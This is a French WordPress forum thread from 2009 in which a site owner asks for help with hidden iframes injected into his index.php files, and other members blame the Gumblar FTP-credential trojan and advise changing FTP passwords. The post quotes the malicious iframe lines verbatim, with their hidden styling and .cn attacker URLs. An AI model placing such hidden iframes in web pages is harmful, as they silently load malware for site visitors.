Injection iframe dans les pages contenant « index » dans leur nom (Créer un compte)

  • Statut : non résolu
8 sujets de 1 à 8 (sur un total de 8)
  • Auteur
    Messages
  • #471155
    Murazor
    Membre
    Initié WordPress
    3 contributions

    Bonjour,

    Ma configuration WP actuelle
    – Version de WordPress : 2.7.1
    – Thème utilisé : cute-bubbles
    – Plugins en place : akismet, category-icons, event-calendar, events-calendar, wp-pools.2.31 (sachant qu’il me semble que seul akismet soit activé)
    – Nom de l’hebergeur : OVH
    – Adresse du site : http://www.fardsetjupons.fr

    Problème(s) rencontré(s) :
    Bonjour à tous, depuis quelques jours, je rencontre un problème assez dérangeant sur le blog WordPress de ma chère et tendre, à savoir qu’un hacker/bot/chinois parvient à insérer du code HTML dans les pages nommées « index.php » (il s’en est même pris à un « index_old.html » ce qui me laisse fortement penser à un bot).

    Exemple de page ayant subit une injection :

    Page index.php à la racine du répertoire www

    <?php
    /**
    * Front to the WordPress application. This file doesn't do anything, but loads
    * wp-blog-header.php which does and tells WordPress to load the theme.
    *
    * @package WordPress
    */

    /**
    * Tells WordPress to load the WordPress theme and output it.
    *
    * @var bool
    */
    define('WP_USE_THEMES', true);

    /** Loads the WordPress Environment and Template */
    require('./wp-blog-

    <iframe src="http://bigbestlite.cn:8080/index.php" width=116 height=183 style="visibility: hidden"></iframe>

    Page index.php du dossier wp-admin

    <?php
    /**
    * Dashboard Administration Panel
    *
    * @package WordPress
    * @subpackage Administration
    */

    /** Load WordPress Bootstrap */
    require_once('admin.php');

    /** Load WordPress dashboard API */
    require_once(ABSPATH . 'wp-admin/includes/dashboard.php');

    wp_dashboard_setup();

    wp_enqueue_script( 'dashboard' );
    wp_enqueue_script( 'plugin-install' );
    wp_enqueue_script( 'media-upload' );
    wp_admin_css( 'dashboard' );
    wp_admin_css( 'plugin-install' );
    add_thickbox();

    $title = __('Dashboard');
    $parent_file = 'index.php';
    require_once('admin-header.php');

    $today = current_time('mysql', 1);
    ?>

    <div class="wrap">
    <?php screen_icon(); ?>
    <h2><?php echo wp_specialchars( $title ); ?></h2>

    <div id="dashboard-widgets-wrap">

    <?php wp_dashboard(); ?>

    <div class="clear">

    Page index.php du répertoire wp-content

    <?php
    // Silence is golden.


    <iframe src="http://greatmixlot.cn:8080/ts/in.cgi?pepsi63" width=125 height=125 style="visibility: hidden"></ifra

    <iframe src="http://bigbestlite.cn:8080/index.php" width=116 height=183 style="visibility: hidden"></iframe>

    On retrouve donc à chaque fois ces saloperies d’iframes cachées avec un site web chinois à la con qui ne m’inspire pas vraiment confiance :

    <iframe src="http://bigbestlite.cn:8080/index.php" width=116 height=183 style="visibility: hidden"></iframe>

    Quelqu’un aurait-il déjà été victime de cette faille ?
    La dernière MAJ WordPress permet-elle de l’éviter ?
    Comment cela a-t-il pu arriver ?

    On m’a parlé d’une éventuelle infection du serveur OVH lui-même mais ça me semble gros…

    Merci par avance de votre aide !

    #676974
    Murazor
    Membre
    Initié WordPress
    3 contributions

    Je me permet de up ce thread… Ce problème me pose vraiment beaucoup de soucis.
    Si vous avez la moindre idée n’hésitez pas !

    #676975
    Murazor
    Membre
    Initié WordPress
    3 contributions

    Je up une dernière fois ce thread en espérant qu’au moins une personne pourra me répondre.
    Depuis la dernière fois :

    J’ai mis à jour WordPress vers la version 2.8
    J’ai supprimé tous les thèmes et plugins dont je ne me sers pas et il ne me reste plus qu’Akismet.
    J’ai mis à jour mon phpmyvisites

    Et ça fait la 4ème fois que cette personne malveillante me fout ces saloperies de morceaux de code HTML à la fin de chaque page dont le nom contient « index » ou « default »…

    PITIE AIDEZ MOI JE DEVIENS FOU :fire::fire::fire::fire:

    #676976
    BertrandB21
    Membre
    Maître WordPress
    590 contributions

    Je vais repasser l’information que j’ai eu sur un forum d’hébergeur il y a actuellement des virus qui se promène et qui attaque les principaux clients ftp. Donc l’hébergeur préconisait 1) de changer le mot de passe ftp sur le serveur, 2) désinfecter sa machine habituelle, 3) reparamétrer son client ftp

    je ne dis pas que c’est cela mais c’est une piste à creuser

    #676977
    Wazza
    Membre
    Initié WordPress
    21 contributions

    Oui c’est un trojan qui infecte en ce moment pas mal de Site et notemant des WP.

    Gamblar et martuz.cn

    Il copent les code FTP par trojan et injectent des iframe partout ou ils peuvent.

    Le virus utilise ces logiciels pour vous infecter. Une fois infecter, il choppe des mots de passe qu’il utilise pour infecter des sites. Ensuite les sites ouvrent automatiquement de manière cachée un PDF verolé qui contamine les internautes. La boucle est bouclée : ce virus circule de particulier à site et de site à particulier.
    Plus d’info :
    http://www.sur-la-toile.com/article-7436-L%92attaque-Gumblar-continue&#8230;.html
    http://www.clubic.com/actualite-277286-gumblar-attaque-xss-prend-ampleur.html
    http://garwarner.blogspot.com/2009/06/gumblars-48000-compromised-domains.html

    #676978
    Wazza
    Membre
    Initié WordPress
    21 contributions

    La solution est de changer les pass FTP et de voir comment ils ont pu être copiés.

    #676979
    kimeidugel
    Membre
    Initié WordPress
    29 contributions

    Je suis touché. C’est particulièrement douloureux…

    #676980
    el_fantome
    Participant
    Initié WordPress
    7 contributions

    Bonjour,

    Une solution détaillée pour ce problème d’injection iframe:

    Solution pour le problème d’attaque par injection iframe

8 sujets de 1 à 8 (sur un total de 8)
  • Vous devez être connecté pour répondre à ce sujet.